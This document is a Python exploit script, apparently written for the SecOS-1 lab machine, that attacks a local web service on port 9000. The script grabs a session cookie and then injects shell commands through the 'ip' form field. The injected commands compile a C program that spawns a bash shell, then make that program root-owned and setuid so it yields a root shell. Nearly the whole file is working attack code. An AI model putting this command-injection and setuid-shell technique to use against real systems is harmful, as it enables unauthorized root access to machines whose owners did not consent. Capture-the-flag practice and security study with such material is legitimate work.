SecOS-1 Local Privilege Escalation Exploit

secos1_exploit.py

#!/usr/bin/env python
# Author: Juan (@itsecurityco)

import socket
from re import search
from uuid import uuid4
from time import sleep

HOST = '127.0.0.1'
PORT = 9000
FILENAME = str(uuid4().get_hex().upper()[0:10])

s = None
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM):
    af, socktype, proto, canonname, sa = res
    try:
        s = socket.socket(af, socktype, proto)
    except socket.error as msg:
        s = None
        continue
    try:
        s.connect(sa)
    except socket.error as msg:
        s.close()
        s = None
        continue
    break
if s is None:
    print '[!] Could not open socket'
    sys.exit(1)

print "[*] Getting Set-Cookie..."
s.sendall("GET / HTTP/1.1\r\nHost: %s:%d\r\n\r\n" % (HOST,PORT))
data = s.recv(1024)

m = search("Set-Cookie: (.*);",data)
cookie = m.group(1)[:-8]
print "[*] Cookie: %s" % cookie
payload = "127.0.0.1 -w1;echo 'main(){setuid(0);setgid(0);system(\"/bin/bash\");}'>/tmp/%s.c;gcc /tmp/%s.c -o /tmp/%s;sleep 5;chown root /tmp/%s;chmod 4777 /tmp/%s; id" % (FILENAME, FILENAME, FILENAME, FILENAME, FILENAME)

req = "POST / HTTP/1.1\r\n"
req += "Host: %s:%d\r\n" % (HOST,PORT)
req += "Cookie: %s\r\n" % cookie
req += "Connection: keep-alive\r\n"
req += "Content-Type: application/x-www-form-urlencoded\r\n"
req += "Content-Length: %d\r\n" % len(payload)
req += "\r\n"
req += "ip=%s" % payload

print "[*] Sending payload: %s" % payload
s.sendall(req)
data2 = s.recv(1024)
s.close()
print "[*] Wait for 10 seconds..."
sleep(10)
print "[!] Run /tmp/%s to get root shell" % FILENAME